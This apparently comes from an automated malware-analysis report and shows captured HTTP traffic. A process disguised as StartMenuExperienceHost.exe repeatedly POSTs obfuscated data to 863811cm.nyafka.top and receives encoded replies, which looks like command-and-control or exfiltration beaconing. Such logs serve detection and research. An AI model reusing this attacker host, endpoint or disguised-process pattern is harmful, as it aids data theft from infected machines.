                                                                Oct 11, 2024 01:37:41.087944031 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:41.440697908 CEST2004OUTData Raw: 55 5e 58 59 54 54 58 56 5e 5a 55 58 51 53 5a 5b 57 58 58 5f 55 52 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^XYTTXV^ZUXQSZ[WXX_URQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)>/+*2.#+5!($(3R47<$%W*;(@!"$Y=+#Y$/\*9
                                                                Oct 11, 2024 01:37:41.542393923 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:41.798135042 CEST752INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQ%2BVmnv9CrwYTMzriywZZLSSiXvuLG8YTshiRiNXB6sdumrOPJ0%2BABQVPLUlep%2FKo01II%2FCbM6pTt7HKrfkYA2FX6vugt%2BBIQGet8KKfNBx%2BS0QIoqZMTj9dO%2BE7eNxAdIZrris7"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70925c8172b6-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5c 29 29 3a 52 22 2d 33 5b 2f 08 27 03 2a 03 25 05 3f 31 2b 5e 32 24 23 5d 2e 3f 22 0e 21 2b 28 5f 3d 2c 26 1c 27 02 34 02 2b 21 2a 51 03 1b 3a 01 3c 23 37 54 2b 22 31 17 2b 22 25 5d 33 0d 2a 1d 2a 2e 31 12 27 10 21 01 22 1f 27 0b 3e 5a 30 0f 38 02 34 18 28 28 3e 59 20 2b 2a 5f 08 13 39 51 29 2b 24 57 21 0e 22 00 35 04 37 1f 35 39 2e 14 29 00 3e 56 27 0d 3f 06 38 0b 3f 03 20 3c 23 55 35 3f 2a 52 37 3e 3c 58 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'\)):R"-3[/'*%?1+^2$#].?"!+(_=,&'4+!*Q:<#7T+"1+"%]3**.1'!"'>Z084((>Y +*_9Q)+$W!"5759.)>V'?8? <#U5?*R7><X%"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.550097188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:41.163533926 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:41.518928051 CEST2584OUTData Raw: 50 58 58 5d 51 5c 5d 52 5e 5a 55 58 51 5d 5a 5b 57 5c 58 5e 55 53 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PXX]Q\]R^ZUXQ]Z[W\X^USQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X(>([?) %X0C?6/68#+3 '(0-=;<A "0*+#Y$/\*
                                                                Oct 11, 2024 01:37:41.609534979 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:41.853075027 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5%2FEjjCYUVfC8yp4kjXxR6bDBGWvo2rEKNEQTdaHmLd8k3u5%2BKwVNgk8Jx%2Bjyna3IGqCfllWguzeJKGN3kBpSTXJvNi%2Buhslm58fAOi6u3l6HGucwJmSJVZ5mT26tkXf4h1bUbSY"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7092ca6e0f46-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.550098188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:41.921542883 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:42.268851995 CEST2004OUTData Raw: 50 5c 58 59 51 5b 58 54 5e 5a 55 58 51 51 5a 52 57 5d 58 54 55 53 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\XYQ[XT^ZUXQQZRW]XTUSQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+=<]<,&-3+&(58<?"7?&-->#6,Z*+#Y$/\*1
                                                                Oct 11, 2024 01:37:42.368360043 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:42.623291969 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gAG4QKB1XTKlWa4ip8TIT07NnT%2BOTcQYxsyO95AXilOe1aS0V2z%2BKXRH1Ep5E3NfqQM69lxw%2BtFhKuS7Nd9elunfr9kHrPX7dlmAsL55hwyxy9U1o4UzE6BTd5P9FeYehpwQjFhs"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70978f2b8c36-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 28 29 0f 0c 20 3e 20 01 2d 31 24 12 3d 3d 3e 1b 28 21 34 03 25 34 3c 04 2d 3f 25 55 36 3b 0e 58 28 2c 00 58 24 12 37 12 2b 21 2a 51 03 1b 39 5e 3f 23 2f 1d 2b 21 2e 06 2b 0c 0c 00 27 55 36 1c 3e 04 29 1d 27 58 2e 5d 21 22 2b 0c 2a 2c 23 1d 2f 3b 20 1a 29 28 32 13 23 11 2a 5f 08 13 39 56 3e 5e 28 51 21 0e 2a 00 22 13 30 0f 22 29 36 52 3d 5f 2e 1e 24 33 23 07 2c 22 2f 06 21 2c 2b 57 22 12 3e 57 20 13 34 1e 32 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'() > -1$==>(!4%4<-?%U6;X(,X$7+!*Q9^?#/+!.+'U6>)'X.]!"+*,#/; )(2#*_9V>^(Q!*"0")6R=_.$3#,"/!,+W">W 42"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.550099188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:41.977433920 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2580
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:42.331923008 CEST2580OUTData Raw: 50 5d 5d 5d 54 5e 5d 53 5e 5a 55 58 51 55 5a 53 57 5f 58 59 55 56 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]]]T^]S^ZUXQUZSW_XYUVQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_<<X<%>(6/53?R7$'=%T)A!'=#Y$/\*
                                                                Oct 11, 2024 01:37:42.421405077 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:42.589339018 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4m71vJxdtYYBWhLVRsEZlrPmEdwzWtJYz6Yr6qJyxum3QpXiMDNQtNwoKxDrg1GphxW9qTGsWJX2WjfeWS7SeoEeIkFZH4s%2FtFntXurFTEdA4wzB8sRnXhZ7c6C5Q%2BklmhXsp9f"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7097dc024393-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.550100188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:42.761743069 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:43.112576008 CEST2004OUTData Raw: 55 5d 5d 5e 51 58 58 55 5e 5a 55 58 51 52 5a 53 57 5d 58 55 55 57 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]^QXXU^ZUXQRZSW]XUUWQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y(\?*,2(&3!+(R ,3-1U(;$6;=#Y$/\*
                                                                Oct 11, 2024 01:37:43.228523016 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:43.486478090 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHe8fpLwxJq5J8KG3jyYipecw%2BTBlESM043Sb8Wf%2FJNwXRbwndNMQ8WCgn3VKho7XOatgM%2BLy7%2BT2KrecjQR1q%2BWocUM78CkfxCcKcSbq7CZ4x3bUIeDpbyJ9YACCRabUv9LXks1"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a709cd9210f74-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 29 29 21 0f 20 3e 0e 05 3b 57 20 5b 2a 2d 21 04 2b 31 33 5e 25 24 37 5d 2c 3c 07 53 35 5d 30 5c 3d 2f 29 06 27 2c 23 5a 2b 21 2a 51 03 1b 39 5e 2b 0d 2b 56 2b 1c 26 06 28 0b 39 58 26 33 35 0b 3d 3e 35 1c 27 3d 3a 5e 21 21 34 53 29 2f 3b 10 2c 3b 2c 1c 3d 01 3e 59 20 2b 2a 5f 08 13 39 51 3e 01 34 54 22 09 07 58 23 2e 37 10 21 29 00 1a 29 5f 25 0e 30 33 28 17 2c 0b 3b 07 34 2c 2b 1d 35 05 36 55 20 3d 2c 5c 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']))! >;W [*-!+13^%$7],<S5]0\=/)',#Z+!*Q9^++V+&(9X&35=>5'=:^!!4S)/;,;,=>Y +*_9Q>4T"X#.7!))_%03(,;4,+56U =,\&8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.550101188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:42.827410936 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:43.175085068 CEST2584OUTData Raw: 55 5a 5d 5b 54 54 5d 56 5e 5a 55 58 51 56 5a 5c 57 50 58 54 55 54 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ][TT]V^ZUXQVZ\WPXTUTQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:). \<)81<'#+() 67V0*8;" [>#Y$/\*-
                                                                Oct 11, 2024 01:37:43.291824102 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:43.537017107 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0JNmXXBW02QZXWNUhrSFUFU7POMlSaMDnqyJoemwWAJmXqHWBIbg930KSgfisvEx67mTeOiu7moqlCOMKK7IhMYKghSUXH%2Fo4G74fW77n41zFsj%2B%2FyoCn3tOy6Vsc5Hw6NB7QBp5"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a709d4c284331-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:43.597841978 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:43.696655035 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:43.696820021 CEST2004OUTData Raw: 55 5e 5d 55 54 5a 58 55 5e 5a 55 58 51 54 5a 59 57 5a 58 5b 55 55 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]UTZXU^ZUXQTZYWZX[UUQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<>,Y?)#T&>C+6<! +#;P3..>8("#*+#Y$/\*%
                                                                Oct 11, 2024 01:37:44.002238035 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bjtd5ICqexG0258a%2BuWivtdvi3NrkNOoptrp1s23sblbZPBeK0k6JY7gG%2BYwkAwGksYCgeib4WuTnoZEkpnM0TG9zu2TxOXwxlF9YIq8UpKaAqB3fLx8GkhHqyXW4HXOE0gafFJc"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a709fcf284331-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 29 5f 2d 0d 23 2e 05 5a 2f 08 2c 5e 29 3d 25 01 28 08 2f 12 24 34 2b 59 2d 12 25 56 22 2b 3c 5d 29 12 22 12 30 12 3b 58 28 31 2a 51 03 1b 39 11 2b 33 01 57 3f 0c 36 03 3f 54 32 07 24 33 32 19 29 2e 29 56 24 3e 26 5d 23 22 3c 54 3d 3c 3f 1e 3b 05 02 1b 2a 01 3e 13 34 2b 2a 5f 08 13 39 55 2a 06 27 0c 20 24 36 04 21 13 16 0b 20 39 2e 57 3e 17 03 0c 25 23 33 07 2f 22 01 00 20 59 20 0e 36 3c 03 0b 37 5b 2c 13 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)_-#.Z/,^)=%(/$4+Y-%V"+<])"0;X(1*Q9+3W?6?T2$32).)V$>&]#"<T=<?;*>4+*_9U*' $6! 9.W>%#3/" Y 6<7[,2("_")Q?TR0
                                                                Oct 11, 2024 01:37:44.113053083 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:44.211055040 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:44.211225033 CEST2004OUTData Raw: 55 5e 5d 58 51 5f 58 50 5e 5a 55 58 51 5d 5a 59 57 5b 58 55 55 55 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]XQ_XP^ZUXQ]ZYW[XUUUQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_+=,<)3V%=8*54\5#<=#B('=>>8C52$Y>#Y$/\*
                                                                Oct 11, 2024 01:37:44.509605885 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GiEwEm%2FOU7NcJzmzfOyoNl11lBawyyPwRLaETfk%2Fzu60oZK6ilWlMDnftsEWTalybabjcQRS57eFa%2BARSpJFkh5WJi0GY4JLrPxfb1qHloRVgbfUfvKBFMinEt%2BQB5i9px7ifDGk"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70a30af64331-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 29 17 32 55 37 2d 2f 5c 3b 32 20 5f 29 3d 26 14 3c 21 37 5e 25 42 34 01 2d 05 3d 1c 22 15 0d 05 29 02 2e 5b 27 02 01 10 3c 0b 2a 51 03 1b 3a 07 3c 20 34 0d 28 0c 0b 5d 3c 0b 2e 05 33 23 13 43 3d 03 03 50 24 3d 3a 14 21 32 38 55 3d 3c 3c 0c 2d 3b 23 42 3d 38 22 10 23 2b 2a 5f 08 13 39 13 2a 28 09 09 35 24 39 58 36 03 27 10 35 3a 2a 14 3f 3a 3a 57 33 33 30 5f 38 0b 24 5a 37 3f 0e 08 21 12 2d 0e 21 3e 20 5d 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)2U7-/\;2 _)=&<!7^%B4-=").['<*Q:< 4(]<.3#C=P$=:!28U=<<-;#B=8"#+*_9*(5$9X6'5:*?::W330_8$Z7?!-!> ]%("_")Q?TR0
                                                                Oct 11, 2024 01:37:44.628747940 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:44.727343082 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:44.727581978 CEST2004OUTData Raw: 50 5a 58 5e 54 59 5d 54 5e 5a 55 58 51 56 5a 5e 57 5e 58 54 55 5c 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZX^TY]T^ZUXQVZ^W^XTU\Q]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+7('&-/*%6+)#-47$'-)V=(? 10X>#Y$/\*-
                                                                Oct 11, 2024 01:37:44.967866898 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:45.260570049 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5gt%2BXnW60v9twhVx30AK0wAP9Qf1psZPYakugB1Zy05x8YW88Jh2LXOf%2BYJszmjG63jxFIXStVz6YvxtCVIbMX9%2FOEYJTH09SaVDr7qoivrli27Y5e5ZhHLLX6qKgaV5g8gw%2FoM8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70a63ee44331-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 00 3e 00 3a 53 23 10 3f 59 2f 31 3b 01 29 5b 32 1b 3c 31 3b 59 26 1a 28 01 2e 02 0b 11 22 5d 20 59 29 2c 35 06 26 3f 28 05 3c 31 2a 51 03 1b 3a 01 2b 23 34 0d 29 31 31 17 28 32 29 5f 33 0a 26 18 3d 3d 31 50 27 2d 3d 01 22 0f 2f 0d 29 05 30 0f 2c 02 3c 1d 28 3b 26 58 20 11 2a 5f 08 13 3a 09 3e 16 3b 08 22 27 0f 5c 35 3d 37 10 36 39 2a 51 3e 07 2e 1c 30 23 30 5d 2f 0c 2f 03 21 2f 2b 55 36 2c 29 0e 20 03 37 01 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>:S#?Y/1;)[2<1;Y&(."] Y),5&?(<1*Q:+#4)11(2)_3&==1P'-="/)0,<(;&X *_:>;"'\5=769*Q>.0#0]//!/+U6,) 72("_")Q?TR0
                                                                Oct 11, 2024 01:37:45.379067898 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1980
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:45.681174040 CEST25INHTTP/1.1 100 Continue
